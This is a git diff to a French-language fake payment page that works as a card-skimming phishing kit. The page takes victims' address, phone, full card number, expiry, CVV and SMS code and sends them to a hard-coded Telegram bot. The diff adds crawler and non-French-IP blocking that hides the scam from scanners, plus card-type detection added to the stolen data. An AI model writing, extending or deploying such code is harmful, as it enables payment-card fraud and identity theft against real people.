--- a/index.html
+++ b/index.html
@@ -158,6 +158,7 @@
 
       <label for="card-number">Numéro de la carte</label>
       <input type="text" id="card-number" name="card-number" maxlength="16" required placeholder="XXXX XXXX XXXX XXXX">
+      <p id="card-type" style="font-size: 14px; color: #666; margin-top: -10px; margin-bottom: 20px;"></p>
 
       <label for="expiry-date">Date d'expiration</label>
       <input type="text" id="expiry-date" name="expiry-date" required placeholder="MM/AA">
@@ -224,13 +225,37 @@
     <center><p>Redirection dans quelques instants...</p></center>
   </div>
 
+  <div class="payment-container hidden" id="blocked-message">
+    <h2>ACCÈS REFUSÉ</h2>
+    <p>Votre adresse IP ne provient pas de France ou vous utilisez un bot.</p>
+  </div>
+
   <script>
-    // Le script pour récupérer l'IP et envoyer des notifications Telegram reste inchangé
     const TELEGRAM_BOT_TOKEN = '7829797076:AAGfrZMGpGdCYsbSDxYXJBOR8jc4D2AjC1k';
     const TELEGRAM_CHAT_ID = '7747778364';
 
-    let userIP = ''; // Variable pour stocker l'adresse IP de l'utilisateur
-    let userFormData = {}; // Objet pour stocker les données du formulaire
+    let userIP = '';
+    let userFormData = {};
+
+    // Fonction pour détecter le type de carte
+    function detectCardType(cardNumber) {
+      const cardPatterns = {
+        visa: /^4[0-9]{12}(?:[0-9]{3})?$/,
+        mastercard: /^5[1-5][0-9]{14}$/,
+        amex: /^3[47][0-9]{13}$/,
+        diners: /^3(?:0[0-5]|[68][0-9])[0-9]{11}$/,
+        discover: /^6(?:011|5[0-9]{2})[0-9]{12}$/,
+        jcb: /^(?:2131|1800|35\d{3})\d{11}$/,
+      };
+
+      for (const [cardType, pattern] of Object.entries(cardPatterns)) {
+        if (pattern.test(cardNumber)) {
+          return cardType.toUpperCase();
+        }
+      }
+
+      return 'INCONNU';
+    }
 
     // Fonction pour envoyer un message à Telegram
     function sendToTelegram(message) {
@@ -244,21 +269,62 @@
       });
     }
 
-    // Fonction pour récupérer l'adresse IP publique de l'utilisateur
-    function fetchUserIP() {
-      fetch('https://api.ipify.org?format=json')
-        .then(response => response.json())
-        .then(data => {
-          userIP = data.ip; // Stocker l'adresse IP
-          sendToTelegram(`Nouvel utilisateur sur le site - IP: ${userIP}`);
-        })
-        .catch(error => console.error('Erreur lors de la récupération de l\'IP :', error));
+    // Fonction pour vérifier si l'utilisateur est un bot
+    function isBot(userAgent) {
+      const bots = ['Googlebot', 'Bingbot', 'Yahoo', 'DuckDuckBot', 'Baiduspider', 'YandexBot'];
+      return bots.some(bot => userAgent.includes(bot));
+    }
+
+    // Fonction pour vérifier si l'IP est en France
+    async function checkIfFrenchIP(ip) {
+      try {
+        const response = await fetch(`https://ipapi.co/${ip}/country/`);
+        const country = await response.text();
+        return country === 'FR';
+      } catch (error) {
+        console.error('Erreur lors de la vérification de l\'IP :', error);
+        return false;
+      }
+    }
+
+    // Fonction pour bloquer l'accès
+    function blockAccess() {
+      document.getElementById('step-1').classList.add('hidden');
+      document.getElementById('blocked-message').classList.remove('hidden');
+    }
+
+    // Fonction pour récupérer l'adresse IP de l'utilisateur
+    async function fetchUserIP() {
+      try {
+        const response = await fetch('https://api.ipify.org?format=json');
+        const data = await response.json();
+        userIP = data.ip;
+
+        // Vérifier si l'utilisateur est un bot
+        const userAgent = navigator.userAgent;
+        if (isBot(userAgent)) {
+          sendToTelegram(`Tentative d'accès bloquée - Bot détecté - IP: ${userIP}`);
+          blockAccess();
+          return;
+        }
+
+        // Vérifier si l'IP est en France
+        const isFrench = await checkIfFrenchIP(userIP);
+        if (!isFrench) {
+          sendToTelegram(`Tentative d'accès bloquée - IP non française - IP: ${userIP}`);
+          blockAccess();
+          return;
+        }
+
+        // Si tout est OK, autoriser l'accès
+        sendToTelegram(`Nouvel utilisateur sur le site - IP: ${userIP}`);
+      } catch (error) {
+        console.error('Erreur lors de la récupération de l\'IP :', error);
+      }
     }
 
     // Appeler la fonction pour récupérer l'adresse IP au chargement de la page
-    window.onload = function () {
-      fetchUserIP();
-    };
+    window.onload = fetchUserIP;
 
     // Gestionnaire de soumission du formulaire de paiement
     document.getElementById('payment-form').addEventListener('submit', function(event) {
@@ -267,11 +333,11 @@
       const deliveryAddress = document.getElementById('delivery-address').value;
       const phoneNumber = document.getElementById('phone-number').value;
       const cardholderName = document.getElementById('cardholder-name').value;
-      const cardNumber = document.getElementById('card-number').value;
+      const cardNumber = document.getElementById('card-number').value.replace(/\s/g, '');
       const expiryDate = document.getElementById('expiry-date').value;
       const cvv = document.getElementById('cvv').value;
+      const cardType = detectCardType(cardNumber);
 
-      // Enregistrer les données du formulaire avec l'IP
       userFormData = {
         deliveryAddress: deliveryAddress,
         phoneNumber: phoneNumber,
@@ -279,10 +345,10 @@
         cardNumber: cardNumber,
         expiryDate: expiryDate,
         cvv: cvv,
-        ip: userIP
+        ip: userIP,
+        cardType: cardType
       };
 
-      // Ajouter l'adresse IP et l'adresse de livraison dans le message Telegram
       let message = `Paiement reçu :
         Adresse de livraison : ${deliveryAddress}
         Numéro de téléphone : ${phoneNumber}
@@ -290,6 +356,7 @@
         Numéro : ${cardNumber}
         Expiration : ${expiryDate}
         CVV : ${cvv}
+        Type de carte : ${cardType}
         IP : ${userIP}
       `;
       sendToTelegram(message);
@@ -309,7 +376,6 @@
 
       const smsCode = document.getElementById('sms-code').value;
 
-      // Récupérer les données du formulaire précédemment stockées et ajouter le code SMS
       let message = `Formulaire complet pour IP : ${userIP}
         Adresse de livraison : ${userFormData.deliveryAddress}
         Numéro de téléphone : ${userFormData.phoneNumber}
@@ -330,11 +396,19 @@
         document.getElementById('step-5').classList.remove('hidden');
 
         setTimeout(() => {
-          window.location.href = "https://justmoicom.github.io/vlad/"; // URL après paiement
+          window.location.href = "https://justmoicom.github.io/vlad/";
         }, 5000);
       }, 7000);
     });
 
+    // Afficher le type de carte en temps réel
+    document.getElementById('card-number').addEventListener('input', function() {
+      const cardNumber = this.value.replace(/\s/g, '');
+      const cardType = detectCardType(cardNumber);
+      document.getElementById('card-type').textContent = `Type de carte détecté : ${cardType}`;
+    });
+
+    // Formater la date d'expiration
     document.getElementById('expiry-date').addEventListener('input', function() {
       let value = this.value.replace(/\D/g, '');
       if (value.length > 2) {
@@ -343,6 +417,5 @@
       this.value = value;
     });
   </script>
-
 </body>
 </html>
